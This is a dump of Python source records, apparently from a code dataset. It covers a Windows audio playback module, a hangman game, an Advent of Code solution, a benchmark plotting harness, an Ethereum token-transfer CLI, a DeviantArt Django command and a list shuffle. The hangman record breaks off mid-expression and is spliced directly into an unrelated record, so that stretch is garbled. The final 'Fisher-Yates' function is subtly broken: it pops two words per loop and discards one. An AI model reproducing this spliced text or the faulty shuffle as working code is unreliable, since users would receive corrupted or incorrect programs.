L{feed}.\r\n\t\t\tBITS_PER_BYTE = 8\r\n\t\t\tMS_PER_SEC = 1000\r\n\t\t\tself._minBufferSize = samplesPerSec * channels * (bitsPerSample / BITS_PER_BYTE) / MS_PER_SEC * self.MIN_BUFFER_MS\r\n\t\t\tself._buffer = b\"\"\r\n\t\telse:\r\n\t\t\tself._minBufferSize = None\r\n\t\t#: Function to call when the previous chunk of audio has finished playing.\r\n\t\tself._prevOnDone = None\r\n\t\tself._waveout = None\r\n\t\tself._waveout_event = winKernel.kernel32.CreateEventW(None, False, False, None)\r\n\t\tself._waveout_lock = threading.RLock()\r\n\t\tself._lock = threading.RLock()\r\n\t\tself.open()\r\n\r\n\tdef _setCurrentDevice(self, preferredDevice: typing.Union[str, int]) -> 
None:\r\n\t\t\"\"\" Sets the _outputDeviceID and _outputDeviceName to the preferredDevice if\r\n\t\tit is available, otherwise falls back to WAVE_MAPPER.\r\n\t\t@param preferredDevice: The preferred device to use.\r\n\t\t\"\"\"\r\n\t\tif preferredDevice == WAVE_MAPPER or preferredDevice == self.DEFAULT_DEVICE_KEY:\r\n\t\t\tself._outputDeviceID = WAVE_MAPPER\r\n\t\t\tself._outputDeviceName = \"WAVE_MAPPER\"\r\n\t\t\treturn\r\n\t\ttry:\r\n\t\t\tif isinstance(preferredDevice, str):\r\n\t\t\t\tself._outputDeviceID = outputDeviceNameToID(\r\n\t\t\t\t\tpreferredDevice,\r\n\t\t\t\t\tuseDefaultIfInvalid=True # fallback to WAVE_MAPPER\r\n\t\t\t\t)\r\n\t\t\t\t# If default is used, get the appropriate name.\r\n\t\t\t\tself._outputDeviceName = outputDeviceIDToName(self._outputDeviceID)\r\n\t\t\telif isinstance(preferredDevice, int):\r\n\t\t\t\tself._outputDeviceID = preferredDevice\r\n\t\t\t\tself._outputDeviceName = outputDeviceIDToName(preferredDevice)\r\n\t\t\telse:\r\n\t\t\t\traise TypeError(\"outputDevice\")\r\n\t\texcept (LookupError, TypeError):\r\n\t\t\tlog.warning(\r\n\t\t\t\tf\"Unsupported WavePlayer device argument: {preferredDevice}\"\r\n\t\t\t\tf\" Falling back to WAVE_MAPPER\"\r\n\t\t\t)\r\n\t\t\tself._setCurrentDevice(WAVE_MAPPER)\r\n\r\n\tdef _isPreferredDeviceOpen(self) -> bool:\r\n\t\tif self._waveout is None:\r\n\t\t\treturn False\r\n\t\tif _isDebugForNvWave():\r\n\t\t\tlog.debug(\r\n\t\t\t\tf\"preferred device: {self._preferredDeviceName}\"\r\n\t\t\t\tf\" current device name: {self._outputDeviceName} (id: {self._outputDeviceID})\"\r\n\t\t\t)\r\n\t\treturn self._outputDeviceName == self._preferredDeviceName\r\n\r\n\tdef _isPreferredDeviceAvailable(self) -> bool:\r\n\t\t\"\"\"\r\n\t\t@note: Depending on number of devices being fetched, this may take some time (~3ms)\r\n\t\t@return: True if the preferred device is available\r\n\t\t\"\"\"\r\n\t\tfor ID, name in _getOutputDevices():\r\n\t\t\tif name == self._preferredDeviceName:\r\n\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\tlog.debug(\"preferred Device is Available\")\r\n\t\t\t\treturn True\r\n\r\n\t\tif _isDebugForNvWave():\r\n\t\t\tlog.debug(\"preferred Device is not available\")\r\n\t\treturn False\r\n\r\n\tdef open(self):\r\n\t\t\"\"\"Open the output device.\r\n\t\tThis will be called automatically when required.\r\n\t\tIt is not an error if the output device is already open.\r\n\t\t\"\"\"\r\n\t\twith self._waveout_lock:\r\n\t\t\tif self._waveout:\r\n\t\t\t\treturn\r\n\t\t\tif _isDebugForNvWave():\r\n\t\t\t\tlog.debug(\r\n\t\t\t\t\tf\"Calling winmm.waveOutOpen.\"\r\n\t\t\t\t\tf\" outputDeviceName: {self._outputDeviceName}\"\r\n\t\t\t\t\tf\" outputDeviceID: {self._outputDeviceID}\"\r\n\t\t\t\t)\r\n\t\t\twfx = WAVEFORMATEX()\r\n\t\t\twfx.wFormatTag = WAVE_FORMAT_PCM\r\n\t\t\twfx.nChannels = self.channels\r\n\t\t\twfx.nSamplesPerSec = self.samplesPerSec\r\n\t\t\twfx.wBitsPerSample = self.bitsPerSample\r\n\t\t\twfx.nBlockAlign: int = self.bitsPerSample // 8 * self.channels\r\n\t\t\twfx.nAvgBytesPerSec = self.samplesPerSec * wfx.nBlockAlign\r\n\t\t\twaveout = HWAVEOUT(0)\r\n\t\t\ttry:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutOpen(\r\n\t\t\t\t\t\tbyref(waveout),\r\n\t\t\t\t\t\tself._outputDeviceID,\r\n\t\t\t\t\t\tLPWAVEFORMATEX(wfx),\r\n\t\t\t\t\t\tself._waveout_event,\r\n\t\t\t\t\t\t0,\r\n\t\t\t\t\t\tCALLBACK_EVENT\r\n\t\t\t\t\t)\r\n\t\t\texcept WindowsError:\r\n\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\tlog.debug(\r\n\t\t\t\t\t\tf\"Error opening\"\r\n\t\t\t\t\t\tf\" outputDeviceName: 
{self._outputDeviceName}\"\r\n\t\t\t\t\t\tf\" with id: {self._outputDeviceID}\"\r\n\t\t\t\t\t)\r\n\t\t\t\tif self._outputDeviceID != WAVE_MAPPER:\r\n\t\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\t\tlog.debug(f\"Falling back to WAVE_MAPPER\")\r\n\t\t\t\t\tself._setCurrentDevice(WAVE_MAPPER)\r\n\t\t\t\t\tself.open()\r\n\t\t\t\telse:\r\n\t\t\t\t\tlog.warning(f\"Unable to open WAVE_MAPPER device, there may be no audio devices.\")\r\n\t\t\t\t\traise # can't open the default device.\r\n\t\t\t\treturn\r\n\t\t\tself._waveout = waveout.value\r\n\t\t\tself._prev_whdr = None\r\n\r\n\tdef feed(\r\n\t\t\tself,\r\n\t\t\tdata: bytes,\r\n\t\t\tonDone: typing.Optional[typing.Callable] = None\r\n\t) -> None:\r\n\t\t\"\"\"Feed a chunk of audio data to be played.\r\n\t\tThis is normally synchronous.\r\n\t\tHowever, synchronisation occurs on the previous chunk, rather than the current chunk;\r\n\t\ti.e. calling this while no audio is playing will begin playing the chunk\r\n\t\tbut return immediately.\r\n\t\tThis allows for uninterrupted playback as long as a new chunk is fed before\r\n\t\tthe previous chunk has finished playing.\r\n\t\t@param data: Waveform audio in the format specified when this instance was constructed.\r\n\t\t@param onDone: Function to call when this chunk has finished playing.\r\n\t\t@raise WindowsError: If there was an error playing the audio.\r\n\t\t\"\"\"\r\n\t\tif not self._minBufferSize:\r\n\t\t\tself._feedUnbuffered_handleErrors(data, onDone=onDone)\r\n\t\t\treturn\r\n\t\tself._buffer += data\r\n\t\t# If onDone was specified, we must play audio regardless of the minimum buffer size\r\n\t\t# so we can accurately call onDone at the end of this chunk.\r\n\t\tif onDone or len(self._buffer) > self._minBufferSize:\r\n\t\t\tdata = self._buffer\r\n\t\t\tself._buffer = b\"\"\r\n\t\t\tself._feedUnbuffered_handleErrors(data, onDone=onDone)\r\n\r\n\tdef _feedUnbuffered_handleErrors(self, data, onDone=None) -> bool:\r\n\t\t\"\"\"Tries to feed the device, on error resets the device and tries again.\r\n\t\t@return: False if second attempt fails\r\n\t\t\"\"\"\r\n\t\ttry:\r\n\t\t\tself._feedUnbuffered(data, onDone=onDone)\r\n\t\t\treturn True\r\n\t\texcept WindowsError:\r\n\t\t\tlog.warning(\"Error during feed. 
Resetting the device.\")\r\n\t\t\ttry:\r\n\t\t\t\tself._close() # don't try to call stop on a \"broken\" device.\r\n\t\t\t\tself._setCurrentDevice(self._preferredDeviceName)\r\n\t\t\t\tself.open()\r\n\t\t\t\tself._feedUnbuffered(data, onDone=onDone)\r\n\t\t\texcept Exception:\r\n\t\t\t\tlog.debugWarning(\"Unable to send data to audio device on second attempt.\", exc_info=True)\r\n\t\t\t\treturn False\r\n\r\n\tdef _feedUnbuffered(self, data, onDone=None):\r\n\t\t\"\"\"\r\n\t\t@note: Raises WindowsError on invalid device (see winmm functions\r\n\t\t\"\"\"\r\n\t\tif self._audioDucker and not self._audioDucker.enable():\r\n\t\t\treturn\r\n\t\twhdr = WAVEHDR()\r\n\t\twhdr.lpData = data\r\n\t\twhdr.dwBufferLength = len(data)\r\n\t\twith self._lock:\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tself.open() # required of close on idle see _idleUnbuffered\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutPrepareHeader(self._waveout, LPWAVEHDR(whdr), sizeof(WAVEHDR))\r\n\t\t\t\t\twinmm.waveOutWrite(self._waveout, LPWAVEHDR(whdr), sizeof(WAVEHDR))\r\n\t\t\tself.sync()\r\n\t\t\tself._prev_whdr = whdr\r\n\t\t\t# Don't call onDone if stop was called,\r\n\t\t\t# as this chunk has been truncated in that case.\r\n\t\t\tif self._prevOnDone is not self.STOPPING:\r\n\t\t\t\tself._prevOnDone = onDone\r\n\r\n\tdef sync(self):\r\n\t\t\"\"\"Synchronise with playback.\r\n\t\tThis method blocks until the previously fed chunk of audio has finished playing.\r\n\t\tIt is called automatically by L{feed}, so usually need not be called directly by the user.\r\n\t\t\"\"\"\r\n\t\twith self._lock:\r\n\t\t\tif not self._prev_whdr:\r\n\t\t\t\treturn\r\n\t\t\tassert self._waveout, \"waveOut None before wait\"\r\n\t\t\twhile not (self._prev_whdr.dwFlags & WHDR_DONE):\r\n\t\t\t\twinKernel.waitForSingleObject(self._waveout_event, winKernel.INFINITE)\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tassert self._waveout, \"waveOut None after wait\"\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutUnprepareHeader(self._waveout, LPWAVEHDR(self._prev_whdr), sizeof(WAVEHDR))\r\n\t\t\tself._prev_whdr = None\r\n\t\t\tif self._prevOnDone is not None and self._prevOnDone is not self.STOPPING:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself._prevOnDone()\r\n\t\t\t\texcept:\r\n\t\t\t\t\tlog.exception(\"Error calling onDone\")\r\n\t\t\t\tself._prevOnDone = None\r\n\r\n\tdef pause(self, switch):\r\n\t\t\"\"\"Pause or unpause playback.\r\n\t\t@param switch: C{True} to pause playback, C{False} to unpause.\r\n\t\t@type switch: bool\r\n\t\t\"\"\"\r\n\t\tif self._audioDucker and self._waveout:\r\n\t\t\tif switch:\r\n\t\t\t\tself._audioDucker.disable()\r\n\t\t\telse:\r\n\t\t\t\tself._audioDucker.enable()\r\n\t\twith self._waveout_lock:\r\n\t\t\tif not self._waveout:\r\n\t\t\t\treturn\r\n\t\t\tif switch:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutPause(self._waveout)\r\n\t\t\telse:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\twinmm.waveOutRestart(self._waveout)\r\n\r\n\tdef idle(self):\r\n\t\t\"\"\"Indicate that this player is now idle; i.e. 
the current continuous segment of audio is complete.\r\n\t\tThis will first call L{sync} to synchronise with playback.\r\n\t\tIf L{closeWhenIdle} is C{True}, the output device will be closed.\r\n\t\tA subsequent call to L{feed} will reopen it.\r\n\t\t\"\"\"\r\n\t\tif not self._minBufferSize:\r\n\t\t\treturn self._idleUnbuffered()\r\n\t\tif self._buffer:\r\n\t\t\tbuffer = self._buffer\r\n\t\t\tself._buffer = b\"\"\r\n\t\t\tself._feedUnbuffered_handleErrors(buffer)\r\n\r\n\t\treturn self._idleUnbuffered()\r\n\r\n\tdef _idleUnbuffered(self):\r\n\t\twith self._lock:\r\n\t\t\tself.sync()\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tif not self._waveout:\r\n\t\t\t\t\treturn\r\n\t\t\t\tif self.closeWhenIdle:\r\n\t\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\t\tlog.debug(\"Closing due to idle.\")\r\n\t\t\t\t\tself._close() # Idle so no need to call stop.\r\n\t\t\t\telse:\r\n\t\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\t\tif not self._isPreferredDeviceOpen() and self._isPreferredDeviceAvailable():\r\n\t\t\t\t\t\t\tif _isDebugForNvWave():\r\n\t\t\t\t\t\t\t\tlog.debug(\"Attempt re-open of preferred device.\")\r\n\t\t\t\t\t\t\tself._close() # Idle so no need to call stop.\r\n\t\t\t\t\t\t\tself._setCurrentDevice(self._preferredDeviceName)\r\n\t\t\t\t\t\t\tself.open()\r\n\t\t\tif self._audioDucker: self._audioDucker.disable()\r\n\r\n\tdef stop(self):\r\n\t\t\"\"\"Stop playback.\r\n\t\t\"\"\"\r\n\t\tif self._audioDucker: self._audioDucker.disable()\r\n\t\tif self._minBufferSize:\r\n\t\t\tself._buffer = b\"\"\r\n\t\twith self._waveout_lock:\r\n\t\t\tif not self._waveout:\r\n\t\t\t\treturn\r\n\t\t\tself._prevOnDone = self.STOPPING\r\n\t\t\ttry:\r\n\t\t\t\twith self._global_waveout_lock:\r\n\t\t\t\t\t# Pausing first seems to make waveOutReset respond faster on some systems.\r\n\t\t\t\t\twinmm.waveOutPause(self._waveout)\r\n\t\t\t\t\twinmm.waveOutReset(self._waveout)\r\n\t\t\texcept WindowsError:\r\n\t\t\t\t# waveOutReset seems to fail randomly on some systems.\r\n\t\t\t\tpass\r\n\t\t# Unprepare the previous buffer and close the output device if appropriate.\r\n\t\tself._idleUnbuffered()\r\n\t\tself._prevOnDone = None\r\n\r\n\tdef close(self):\r\n\t\t\"\"\"Close the output device.\r\n\t\t\"\"\"\r\n\t\tself.stop()\r\n\t\twith self._lock:\r\n\t\t\twith self._waveout_lock:\r\n\t\t\t\tif not self._waveout:\r\n\t\t\t\t\treturn\r\n\t\t\t\tself._close()\r\n\r\n\tdef _close(self):\r\n\t\tif _isDebugForNvWave():\r\n\t\t\tlog.debug(\"Calling winmm.waveOutClose\")\r\n\t\twith self._global_waveout_lock:\r\n\t\t\tif not self._waveout:\r\n\t\t\t\treturn\r\n\t\t\ttry:\r\n\t\t\t\twinmm.waveOutClose(self._waveout)\r\n\t\t\texcept WindowsError:\r\n\t\t\t\tlog.debug(\"Error closing the device, it may have been removed.\", exc_info=True)\r\n\t\tself._waveout = None\r\n\r\n\tdef __del__(self):\r\n\t\tself.close()\r\n\t\twinKernel.kernel32.CloseHandle(self._waveout_event)\r\n\t\tself._waveout_event = None\r\n\t\tsuper().__del__()\r\n\r\n\r\ndef _getOutputDevices():\r\n\t\"\"\"Generator, returning device ID and device Name in device ID order.\r\n\t\t@note: Depending on number of devices being fetched, this may take some time (~3ms)\r\n\t\"\"\"\r\n\tcaps = WAVEOUTCAPS()\r\n\tfor devID in range(-1, winmm.waveOutGetNumDevs()):\r\n\t\ttry:\r\n\t\t\twinmm.waveOutGetDevCapsW(devID, byref(caps), sizeof(caps))\r\n\t\t\tyield devID, caps.szPname\r\n\t\texcept WindowsError:\r\n\t\t\t# It seems that in certain cases, Windows includes devices which cannot be accessed.\r\n\t\t\tpass\r\n\r\n\r\ndef 
getOutputDeviceNames():\r\n\t\"\"\"Obtain the names of all audio output devices on the system.\r\n\t@return: The names of all output devices on the system.\r\n\t@rtype: [str, ...]\r\n\t@note: Depending on number of devices being fetched, this may take some time (~3ms)\r\n\t\"\"\"\r\n\treturn [name for ID, name in _getOutputDevices()]\r\n\r\ndef outputDeviceIDToName(ID):\r\n\t\"\"\"Obtain the name of an output device given its device ID.\r\n\t@param ID: The device ID.\r\n\t@type ID: int\r\n\t@return: The device name.\r\n\t@rtype: str\r\n\t\"\"\"\r\n\tcaps = WAVEOUTCAPS()\r\n\ttry:\r\n\t\twinmm.waveOutGetDevCapsW(ID, byref(caps), sizeof(caps))\r\n\texcept WindowsError:\r\n\t\traise LookupError(\"No such device ID\")\r\n\treturn caps.szPname\r\n\r\n\r\ndef outputDeviceNameToID(name: str, useDefaultIfInvalid=False) -> int:\r\n\t\"\"\"Obtain the device ID of an output device given its name.\r\n\t@param name: The device name.\r\n\t@param useDefaultIfInvalid: C{True} to use the default device (wave mapper) if there is no such device,\r\n\t\tC{False} to raise an exception.\r\n\t@return: The device ID.\r\n\t@raise LookupError: If there is no such device and C{useDefaultIfInvalid} is C{False}.\r\n\t@note: Depending on number of devices, and the position of the device in the list,\r\n\tthis may take some time (~3ms)\r\n\t\"\"\"\r\n\tfor curID, curName in _getOutputDevices():\r\n\t\tif curName == name:\r\n\t\t\treturn curID\r\n\r\n\t# No such ID.\r\n\tif useDefaultIfInvalid:\r\n\t\treturn WAVE_MAPPER\r\n\telse:\r\n\t\traise LookupError(\"No such device name\")\r\n\r\nfileWavePlayer = None\r\nfileWavePlayerThread=None\r\ndef playWaveFile(fileName, asynchronous=True):\r\n\t\"\"\"plays a specified wave file.\r\n\t@param asynchronous: whether the wave file should be played asynchronously\r\n\t@type asynchronous: bool\r\n\t\"\"\"\r\n\tglobal fileWavePlayer, fileWavePlayerThread\r\n\tf = wave.open(fileName,\"r\")\r\n\tif f is None: raise RuntimeError(\"can not open file %s\"%fileName)\r\n\tif fileWavePlayer is not None:\r\n\t\tfileWavePlayer.stop()\r\n\tfileWavePlayer = WavePlayer(\r\n\t\tchannels=f.getnchannels(),\r\n\t\tsamplesPerSec=f.getframerate(),\r\n\t\tbitsPerSample=f.getsampwidth() * 8,\r\n\t\toutputDevice=config.conf[\"speech\"][\"outputDevice\"],\r\n\t\twantDucking=False\r\n\t)\r\n\tfileWavePlayer.feed(f.readframes(f.getnframes()))\r\n\tif asynchronous:\r\n\t\tif fileWavePlayerThread is not None:\r\n\t\t\tfileWavePlayerThread.join()\r\n\t\tfileWavePlayerThread = threading.Thread(\r\n\t\t\tname=f\"{__name__}.playWaveFile({os.path.basename(fileName)})\",\r\n\t\t\ttarget=fileWavePlayer.idle\r\n\t\t)\r\n\t\tfileWavePlayerThread.start()\r\n\telse:\r\n\t\tfileWavePlayer.idle()\r\n\r\n# When exiting, ensure fileWavePlayer is deleted before modules get cleaned up.\r\n# Otherwise, WavePlayer.__del__ will fail with an exception.\r\n@atexit.register\r\ndef _cleanup():\r\n\tglobal fileWavePlayer, fileWavePlayerThread\r\n\tfileWavePlayer = None\r\n\tfileWavePlayerThread = None\r\n","repo_name":"falsecz/python-java-access-bridge","sub_path":"source/nvwave.py","file_name":"nvwave.py","file_ext":"py","file_size_in_byte":19823,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"22767115473","text":"\r\nimport random\r\nword_list = [\"aardvark\", \"baboon\", \"camel\"]\r\nchosen_word = random.choice(word_list)\r\nword_length = len(chosen_word)\r\n\r\n#Testing code\r\nprint(f'Pssst, the solution is {chosen_word}.')\r\n\r\n#Create blanks\r\ndisplay = []\r\nfor _ in range(word_length):\r\n display += \"_\"\r\n\r\n_seq=0\r\nwhile not display.index(\"_\") and _seq\")\n\ni = 0\nfor idx, pad in pads(salt, False):\n i += 1\n if i == 64:\n print(\" - The 64th key index (without key-stretching) is {} -\".format(idx))\n break\n \ni = 0\nfor idx, pad in pads(salt, True):\n i += 1\n if i == 64:\n print(\" - The 64th key index (with key-stretching) is {} -\".format(idx))\n break\n","repo_name":"xSke/aoc16","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5358850332","text":"import glob\nimport multiprocessing\nimport os\nimport time\nimport warnings\nfrom multiprocessing import Process\nfrom typing import Tuple, List\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport psutil\nfrom hbutils.scale import size_to_bytes_str\nfrom hbutils.string import ordinalize, plural_word\nfrom matplotlib.ticker import FuncFormatter\nfrom tqdm.auto import tqdm\n\nfrom conf import PROJ_DIR\nfrom plot import INCHES_TO_PIXELS\n\n_DEFAULT_IMAGE_POOL = glob.glob(os.path.join(PROJ_DIR, 'test', 'testfile', 'dataset', '**', '*.jpg'), recursive=True)\n\n\nclass BaseBenchmark:\n def __init__(self):\n self.all_images = _DEFAULT_IMAGE_POOL\n\n def prepare(self):\n pass\n\n def load(self):\n raise NotImplementedError\n\n def unload(self):\n raise NotImplementedError\n\n def run(self):\n raise NotImplementedError\n\n def run_benchmark(self, run_times):\n logs = []\n current_process = psutil.Process()\n\n def _record(name):\n logs.append((name, current_process.memory_info().rss, time.time()))\n\n # make sure the model is downloaded\n self.prepare()\n self.load()\n self.unload()\n\n _record('')\n\n self.load()\n _record('')\n\n for i in tqdm(range(run_times)):\n self.run()\n _record(f'#{i + 1}')\n\n self.unload()\n _record('')\n\n mems = np.array([mem for _, mem, _ in logs])\n mems -= mems[0]\n times = np.array([time_ for _, _, time_ in logs])\n times -= times[0]\n times[1:] = times[1:] - times[:-1]\n labels = np.array([name for name, _, _ in logs])\n\n return mems, times, labels\n\n def _run_in_subprocess_share(self, run_times, ret):\n ret['retval'] = self.run_benchmark(run_times)\n\n def run_in_subprocess(self, run_times: int = 10, try_times: int = 10):\n manager = multiprocessing.Manager()\n full_deltas, full_times, final_labels = [], [], None\n for i in tqdm(range(try_times)):\n ret = manager.dict()\n p = Process(target=self._run_in_subprocess_share, args=(run_times, ret,))\n p.start()\n p.join()\n if p.exitcode != 0:\n raise ChildProcessError(f'Exitcode {p.exitcode} in {self!r}\\'s {ordinalize(i + 1)} try.')\n\n mems, times, labels = ret['retval']\n deltas = mems[1:] - mems[:-1]\n full_deltas.append(deltas)\n full_times.append(times)\n if final_labels is None:\n final_labels = labels\n\n deltas = np.stack(full_deltas).mean(axis=0)\n final_mems = np.cumsum([0, *deltas])\n final_times = np.stack(full_times).mean(axis=0)\n\n return final_mems, final_times, final_labels\n\n\ndef create_plot_cli(items: List[Tuple[str, BaseBenchmark]],\n title: str = 'Unnamed Benchmark Plot', run_times=15, try_times=10,\n mem_ylog: bool = False, time_ylog: bool = False,\n figsize=(1080, 600), dpi: int = 300):\n def fmt_size(x, pos):\n _ = pos\n warnings.filterwarnings('ignore')\n return size_to_bytes_str(x, precision=1)\n\n def fmt_time(x, pos):\n _ = pos\n if x < 1e-6:\n return f'{x * 1e9:.1f}ns'\n elif x < 1e-3:\n return f'{x * 1e6:.1f}μs'\n elif x < 1:\n return f'{x * 1e3:.1f}ms'\n else:\n return f'{x * 1.0:.1f}s'\n\n @click.command()\n @click.option('--output', '-o', 'save_as', type=click.Path(dir_okay=False), required=True,\n help='Output path of image file.', show_default=True)\n def _execute(save_as):\n fig, axes = plt.subplots(1, 2, figsize=(figsize[0] / INCHES_TO_PIXELS, figsize[1] / INCHES_TO_PIXELS))\n\n if mem_ylog:\n axes[0].set_yscale('log')\n axes[0].yaxis.set_major_formatter(FuncFormatter(fmt_size))\n axes[0].set_title('Memory Benchmark')\n axes[0].set_ylabel('Memory Usage')\n\n if time_ylog:\n axes[1].set_yscale('log')\n 
axes[1].yaxis.set_major_formatter(FuncFormatter(fmt_time))\n axes[1].set_title('Performance Benchmark (CPU)')\n axes[1].set_ylabel('Time Cost')\n\n labeled = False\n\n for name, bm in tqdm(items):\n mems, times, labels = bm.run_in_subprocess(run_times, try_times)\n axes[0].plot(mems, label=name)\n axes[1].plot(times, label=name)\n if not labeled:\n axes[0].set_xticks(range(len(labels)), labels, rotation='vertical')\n axes[1].set_xticks(range(len(labels)), labels, rotation='vertical')\n labeled = True\n\n axes[0].legend()\n axes[0].grid()\n axes[1].legend()\n axes[1].grid()\n\n fig.suptitle(f'{title}\\n'\n f'(Mean of {plural_word(try_times, \"try\")}, '\n f'run for {plural_word(run_times, \"time\")})')\n\n fig.tight_layout()\n plt.savefig(save_as, bbox_inches='tight', dpi=dpi, transparent=True)\n\n return _execute\n","repo_name":"deepghs/imgutils","sub_path":"docs/source/_libs/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"70"}
+{"seq_id":"15301676902","text":"import click\nimport csv\nimport json\n\nfrom ethereumetl.csv_utils import set_max_field_size_limit\nfrom blockchainetl.file_utils import smart_open\nfrom blockchainetl.jobs.exporters.converters.int_to_string_item_converter import IntToStringItemConverter\nfrom ethereumetl.jobs.exporters.token_transfers_item_exporter import token_transfers_item_exporter\nfrom ethereumetl.jobs.extract_token_transfers_job import ExtractTokenTransfersJob\nfrom blockchainetl.logging_utils import logging_basic_config\n\nlogging_basic_config()\n\nset_max_field_size_limit()\n\n@click.command(context_settings=dict(help_option_names=['-h', '--help']))\n@click.option('-l', '--logs', type=str, required=True, help='The CSV file containing receipt logs.')\n@click.option('-b', '--batch-size', default=100, show_default=True, type=int, help='The number of blocks to filter at a time.')\n@click.option('-o', '--output', default='-', show_default=True, type=str, help='The output file. If not specified stdout is used.')\n@click.option('-w', '--max-workers', default=5, show_default=True, type=int, help='The maximum number of workers.')\n@click.option('--values-as-strings', default=False, show_default=True, is_flag=True, help='Whether to convert values to strings.')\ndef extract_token_transfers(logs, batch_size, output, max_workers, values_as_strings=False):\n \"\"\"Extracts ERC20/ERC721 transfers from logs file.\"\"\"\n with smart_open(logs, 'r') as logs_file:\n if logs.endswith('.json'):\n logs_reader = (json.loads(line) for line in logs_file)\n else:\n logs_reader = csv.DictReader(logs_file)\n converters = [IntToStringItemConverter(keys=['value'])] if values_as_strings else []\n job = ExtractTokenTransfersJob(\n logs_iterable=logs_reader,\n batch_size=batch_size,\n max_workers=max_workers,\n item_exporter=token_transfers_item_exporter(output, converters=converters))\n\n job.run()\n","repo_name":"blockchain-etl/ethereum-etl","sub_path":"ethereumetl/cli/extract_token_transfers.py","file_name":"extract_token_transfers.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":2722,"dataset":"github-code","pt":"70"}
+{"seq_id":"21104824591","text":"from datetime import datetime, timedelta\nimport os\nimport pdb\nfrom textwrap import indent\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom deviant import DeviantArt\nfrom data.models import *\nimport json\nimport pickle\nfrom requests_oauthlib import OAuth2Session\nfrom django.conf import settings\nfrom data.models import *\nimport logging\nfrom data import tasks\nlogger = logging.getLogger(__name__)\nBASE_URL = 'https://www.deviantart.com/api/v1/oauth2'\n\n\nclass Command(BaseCommand):\n help = ''\n\n def __authorize(self, user):\n \"\"\"\n docstring\n \"\"\"\n extra = {\n 'client_id': settings.DA_CLIENT_ID,\n 'client_secret': settings.DA_CLIENT_SECRET,\n }\n\n def token_updater(token):\n user.token = token\n user.save()\n\n self.deviant = OAuth2Session(\n client_id=settings.DA_CLIENT_ID,\n token=user.token,\n auto_refresh_kwargs=extra,\n auto_refresh_url=settings.DA_TOKEN_URL,\n token_updater=token_updater\n )\n\n def __init__(self, *args, **kwargs):\n pass\n\n def add_arguments(self, parser):\n parser.add_argument(\"--fetch-deviations\", action='store_true')\n parser.add_argument(\"--process-competitors\", action='store_true')\n\n parser.add_argument(\"--process-favors\", action='store_true')\n parser.add_argument(\"--fetch-watchers\", action='store_true')\n parser.add_argument(\"--prepare-messages\", action='store_true')\n parser.add_argument(\"--do-send\", action='store_true')\n\n def __savejson(self, obj, filename):\n \"\"\"\n docstring\n \"\"\"\n fullname = os.path.join(\"./responses\", filename)\n with open(fullname, 'wt') as outfile:\n outfile.write(json.dumps(obj, indent=2))\n\n def __populate_profiles(self):\n \"\"\"\n docstring\n \"\"\"\n # profile = da.get_profile(w['user']['username'])\n # if profile:\n # if 'stats' in profile:\n # obj.pageview_count = profile['stats']['profile_pageviews']\n # obj.deviations_count = profile['stats']['user_deviations']\n # if 'stats' in profile['user']:\n # obj.watchers_count = profile['user']['stats']['watchers']\n # # self.__savejson(profile, \"./responses/profile.json\")\n # obj.save()\n pass\n\n def __fetch_watchers(self):\n \"\"\"\n docstring\n \"\"\"\n logger.info(\"Fetching watchers...\")\n\n da_username = settings.DA_USERNAME\n dj_user = User.objects.filter(da_username=da_username).first()\n\n da = DeviantArt(dj_user)\n\n watchers = da.list_watchers(da_username)\n for w in watchers:\n obj, created = DAUser.objects.update_or_create(\n username=w['user']['username'], defaults={\n \"user\": dj_user,\n \"userid\": w['user'].get('userid')\n })\n\n def handle(self, *args, **options):\n if options.get('fetch_watchers'):\n self.__fetch_watchers()\n\n if options.get('fetch_deviations'):\n tasks.cycle_deviations()\n if options.get('prepare_messages'):\n tasks.cycle_prepmsg()\n if options['do_send']:\n tasks.cycle_sender()\n if options['process_competitors']:\n logger.info(\"Processing competitors...\")\n tasks.cycle_competitor()\n","repo_name":"Aqudei/deviant","sub_path":"data/management/commands/da.py","file_name":"da.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33526416145","text":"import random\n\ndef fisher_yates_shuffle(array):\n \"\"\"Return a new array of random words poped from inputted dictionary\"\"\"\n shuffled_arr = []\n while array:\n popped_word = array.pop(random.randint(0,len(array)-1))\n shuffled_arr.append(array.pop(random.randint(0,len(array)-1)))\n return shuffled_arr\n\n\narr = \"this is the random arr that i would like to shuffle\".split()\nnew_arr = fisher_yates_shuffle(arr)\nprint(new_arr)\n\n","repo_name":"ajboxjr/CS-2-Tweet-Generator","sub_path":"class1/yates-shuffle.py","file_name":"yates-shuffle.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
